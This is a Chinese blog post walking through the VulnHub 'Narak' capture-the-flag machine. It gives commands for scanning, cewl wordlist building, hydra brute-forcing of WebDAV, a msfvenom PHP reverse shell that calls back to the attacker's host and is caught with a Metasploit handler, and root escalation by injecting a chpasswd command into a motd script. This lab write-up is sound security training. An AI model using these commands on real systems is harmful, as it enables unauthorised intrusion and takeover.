• 【Try to Hack】vulnhub narak


    📒博客主页:开心星人的博客主页
    🔥系列专栏:Try to Hack
    🎉欢迎关注🔎点赞👍收藏⭐️留言📝
    📆首发时间:🌴2022年6月29日🌴
    🍭作者水平很有限,如果发现错误,还望告知,感谢!

    靶机知识点
    1、webdav(重点)
    2、nikto发现敏感信息
    3、cwel爬取字典
    4、hydra爆破
    5、ssh服务
    6、msf反弹shell
    7、motd提权

    主机发现
    arp-scan -l
    在这里插入图片描述
    192.168.0.104 是靶机ip,因为VMware Inc

    端口扫描
    nmap -p- -sV 192.168.0.104
    在这里插入图片描述

    ssh服务和http服务

    访问一下80端口
    在这里插入图片描述
    是个图片展示
    在这里插入图片描述
    翻到最后,Do Not Click
    点一下
    在这里插入图片描述
    看这个url
    在这里插入图片描述
    到了这个目录遍历页面,不知道会不会有PUT文件上传之类的漏洞

    dirb http://192.168.0.104
    常规扫目录
    在这里插入图片描述
    在这里插入图片描述
    没有权限

    访问webdav
    在这里插入图片描述
    需要账号密码。
    webdav是基于http1.1的一种通信协议,类似于ftp的一种协议,可以上传下载文件。

    继续看别的吧

    nikto -host 192.168.0.104 -port 80
    收集一下信息
    在这里插入图片描述
    这一步其实没啥意义,但有时候可能会有用

    cwel爬取网页的账号密码
    cewl http://192.168.0.104/ -w dict.txt
    在这里插入图片描述

    hydra爆破
    hydra -L dict.txt -P dict.txt 192.168.0.104 http-get /webdav
    在这里插入图片描述
    登录一下
    在这里插入图片描述
    还是用命令行来登录吧

    cadaver http://192.168.0.104/webdav
    在这里插入图片描述

    webdav是基于http1.1的一种通信协议,类似于ftp的一种协议,可以上传下载文件。
    再看一眼这个,所以可以传shell了
    在这里插入图片描述
    msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.103 lport=7777 -o shell.php
    生成一个反弹shell的payload
    在这里插入图片描述
    可能需要去掉这个注释符,我去掉了
    保存为了shell0.php

    webdav上传shell
    put shell0.php
    在这里插入图片描述

    msf开启监听

    msfconsole
    use exploit/multi/handler
    set payload php/meterpreter/reverse_tcp
    set lhost 192.168.88.132
    set lport 7777
    run
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6

    浏览器访问一下我们上传的shell

    在这里插入图片描述
    msf这边拿到了shell
    在这里插入图片描述
    想用python弹一个交互式的shell,发现没有python,就这了
    python3 -c 'import pty; pty.spawn("/bin/bash")'
    要用python3
    可以了

    suid提权
    查找具有suid权限的二进制文件
    find / -user root -type f -perm -ug=x,o=w -exec ls -al {} \; 2>/dev/null
    在这里插入图片描述
    一个奇怪的hell.sh
    直接看
    在这里插入图片描述
    brainfuck解码
    得到chitragupt

    在这里插入图片描述
    用刚刚得到的密码,登录其他用户看看
    先su看一下,不行在ssh

    在这里插入图片描述

    cd ~ 一定要去家目录看
    在这里插入图片描述

    拿到了第一个flag,第二个flag肯定是提权

    不知道咋弄,看wp
    motd提权
    还是那个suid一部分可能
    在这里插入图片描述
    有一个00-header文件
    在这里插入图片描述
    motd(message of the day),每日提示,功能就是当我们登录时,来执行motd文件,达到提示目的。这里我们其他人也有修改权限,而且属主是root,可以用来提权。

    当我们通过ssh登录成功的时候,这些sh脚本会以root权限运行输出那些欢迎信息和日期等等,并且我们当前这个用户对这些文件可读可写,那么提权思路就有了,我们可以通过在这些sh脚本中写入一个修改root用户密码的命令,这样当我们通过ssh用户登录到inferno这个账号上的时候,我们这些motd的sh脚本就会被以root用户的权限执行,这时候我们写入的修改root用户密码的命令也会被执行,之后我们只需要切换到root用户即可完成提权.

    echo "echo 'root:inferno'|sudo chpasswd" >> /etc/update-motd.d/00-header

    我们要用ssh登录inferno
    ssh -p 22 inferno@192.168.0.104
    输入密码chitragupt

    su root
    输入密码为inferno
    登录成功

    flag就在/root下

  • 相关阅读:
    【Java】Map集合
    Linux系统内核作用
    java-php-python-ssm基于网络游戏后台管理系统计算机毕业设计
    【MATLAB】史上最全的7种回归预测算法全家桶
    codesys TCP客户端程序
    从0开始“开发”《CEC-IDE》教程
    Linux 命令(208)—— ssh-keygen 命令
    【Ambari】银河麒麟V10 ARM64架构_安装Ambari2.7.6&HDP3.3.1(HiDataPlus)
    【ACWing 算法基础】双链表(数组模拟双链表)
    Prometheus Operator 自定义监控添加redis explorer
  • 原文地址:https://blog.csdn.net/qq_55675216/article/details/125526337